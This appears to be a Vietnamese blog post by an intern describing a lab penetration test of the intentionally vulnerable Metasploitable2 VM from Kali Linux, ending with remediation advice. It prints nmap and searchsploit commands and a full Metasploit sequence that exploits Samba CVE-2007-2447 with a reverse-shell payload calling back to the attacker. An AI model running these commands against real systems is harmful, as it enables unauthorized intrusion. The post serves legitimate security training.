0
0
Lập trình
NM

Khai Thác Thực Tế với Metasploitable2: Từ Quét đến Khắc Phục

Đăng vào 1 tháng trước

• 2 phút đọc

Giới Thiệu

Trong dự án thực tập thứ hai của tôi, tôi đã làm việc qua quy trình thử nghiệm xâm nhập thực tế sử dụng Kali Linux và Metasploitable2. Mục tiêu: thực hành thu thập thông tin, khai thác lỗ hổng và viết khuyến nghị khắc phục. Dưới đây là những bước tôi đã thực hiện và những bài học kinh nghiệm đã học được.

Môi Trường

  • Hệ điều hành tấn công: Kali Linux
  • Mục tiêu: Metasploitable2 (Máy ảo)

1) Thu Thập Thông Tin & Quét

Tôi bắt đầu với các quét rộng và tập trung sử dụng nmap:

bash Copy
sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x

Điều này đã tiết lộ một số dịch vụ; các dịch vụ tôi tập trung vào là:

  • 21/tcp → vsftpd 2.3.4 (chỉ hiển thị banner; dịch vụ không hoạt động)
  • 445/tcp → Samba smbd 3.x

2) Định Danh & Phân Loại

Sau khi thu thập thông tin về dịch vụ/phần mềm, tôi đã sử dụng searchsploit và kiểm tra thủ công:

bash Copy
searchsploit --nmap scans/target.xml vsftpd 2.3.4
searchsploit samba 3.0.20

Điều này đã cung cấp cho tôi các lỗ hổng khả thi để kiểm tra. Lỗ hổng backdoor của vsftpd (CVE-2011-2523) có trong danh sách, cùng với lỗ hổng script username-map của Samba (CVE-2007-2447).

3) Khai Thác

  • vsftpd (CVE-2011-2523): Thử nghiệm với module Metasploit exploit/unix/ftp/vsftpd_234_backdoor. Banner Nmap cho biết phiên bản vsftpd 2.3.4, nhưng các thử nghiệm kết nối thủ công đã bị timeout và dịch vụ không phản hồi hoàn toàn — lỗ hổng không tạo ra phiên kết nối.
  • Samba (CVE-2007-2447): Sử dụng Metasploit:
bash Copy
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.x.x
set RPORT 445
set payload cmd/unix/reverse
set LHOST <kali-ip>
set LPORT 4444
exploit

Điều này đã sản xuất một shell từ xa hoạt động.

4) Hậu Khai Thác

Với một shell tương tác, tôi đã xác thực quyền hạn:

bash Copy
id
uname -a

Tôi đã ghi lại bằng chứng (chụp màn hình, lệnh, đầu ra) và chuẩn bị ghi chú khắc phục.

5) Tóm Tắt Khắc Phục

  • Quét lỗ hổng liên tục và kiểm kê tài sản.
  • Quản lý bản vá — cập nhật Samba và các dịch vụ khác.
  • Lọc mạng (chặn/giới hạn truy cập đến các cổng 445, 21).
  • Vô hiệu hóa các dịch vụ không sử dụng và truy cập khách/ẩn danh.
  • Áp dụng nguyên tắc quyền tối thiểu cho các chia sẻ và tài khoản.
  • Phân đoạn mạng và ghi lại/theo dõi.
  • Sẵn sàng phản ứng với sự cố.

Kết Quả

Tôi đã đạt được shell từ xa trên Metasploitable2 thông qua lỗ hổng Samba, ghi lại các phát hiện và sản xuất một kế hoạch khắc phục. Việc thực hiện quy trình quét → khai thác → khắc phục đã củng cố tầm quan trọng của việc khắc phục và phát hiện sau khi chứng minh một con đường tấn công.

Nếu ai đó muốn xem ghi chú đầy đủ hoặc các lệnh từng bước, tôi có thể chia sẻ repo với các script và đầu ra ví dụ.

Gợi ý câu hỏi phỏng vấn
Không có dữ liệu

Không có dữ liệu

Bài viết được đề xuất
Bài viết cùng tác giả

Bình luận

Chưa có bình luận nào

Chưa có bình luận nào